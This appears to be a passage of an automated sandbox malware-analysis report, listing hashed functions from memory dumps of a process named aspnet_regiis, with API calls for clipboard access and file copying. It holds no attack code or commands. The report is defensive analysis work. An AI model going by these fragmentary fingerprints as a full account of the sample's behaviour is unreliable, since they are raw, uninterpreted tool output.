                                                                                            • Opcode ID: 643a3811d52c4098da28cf2be096e4b469d380bb2c61cc5630dd1d15197f7802
                                                                                            • Instruction ID: 490d6100a6b447e1019e7114f18484ec5f610699f626d873ce6c4b2024f9daad
                                                                                            • Opcode Fuzzy Hash: 643a3811d52c4098da28cf2be096e4b469d380bb2c61cc5630dd1d15197f7802
                                                                                            • Instruction Fuzzy Hash: A0D0C9323E87417AF134870CAC53F1436546305F51F300204B326FE2D0CAE07145E61D
                                                                                            APIs
                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0093D273
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 130e5f12d1f3d41d7f92f1a10a099523a06672f1e144c3fb2377b58613a489fa
                                                                                            • Instruction ID: 00c154d5230cf9354320155fc7d952c8ee0eedffda46f28ecacc91a033b45ec5
                                                                                            • Opcode Fuzzy Hash: 130e5f12d1f3d41d7f92f1a10a099523a06672f1e144c3fb2377b58613a489fa
                                                                                            • Instruction Fuzzy Hash: 66D0A7321B85047BE210A72CEC07F26376DC302724F448225B2ABC72D3ED116918E575
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1647500905-0
                                                                                            • Opcode ID: fd2f44aaf66df0e3c4a98925690e12a005ee3b5bb46eb546261ac8eff9b993c2
                                                                                            • Instruction ID: 1edc6578deab7e37c500b576b7c5fd075aadfcaf77955f2381646117d8667b85
                                                                                            • Opcode Fuzzy Hash: fd2f44aaf66df0e3c4a98925690e12a005ee3b5bb46eb546261ac8eff9b993c2
                                                                                            • Instruction Fuzzy Hash: 2151E5B1808781DFD710AB78D44A39EBFF0AB11314F04CA2DE49587782E3799658D793
                                                                                            APIs
                                                                                            • CopyFileW.KERNEL32(?,B9F4BBC1,00000000), ref: 0095805E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID: *$*
                                                                                            • API String ID: 1304948518-3771216468
                                                                                            • Opcode ID: 5e6aa5f18e0d50e4610a007e0b55b0a816771fc5822c6b1d0a4857366202f775
                                                                                            • Instruction ID: ad9f7d87fa926f2c5737c66d84aad9cf77d723e1c889da05dd62e80cddfc477b
                                                                                            • Opcode Fuzzy Hash: 5e6aa5f18e0d50e4610a007e0b55b0a816771fc5822c6b1d0a4857366202f775
                                                                                            • Instruction Fuzzy Hash: D111E1B512C3449FE300EF20A85571FBBE8BB99304F544A2CF5C99A280E7B4C2498B17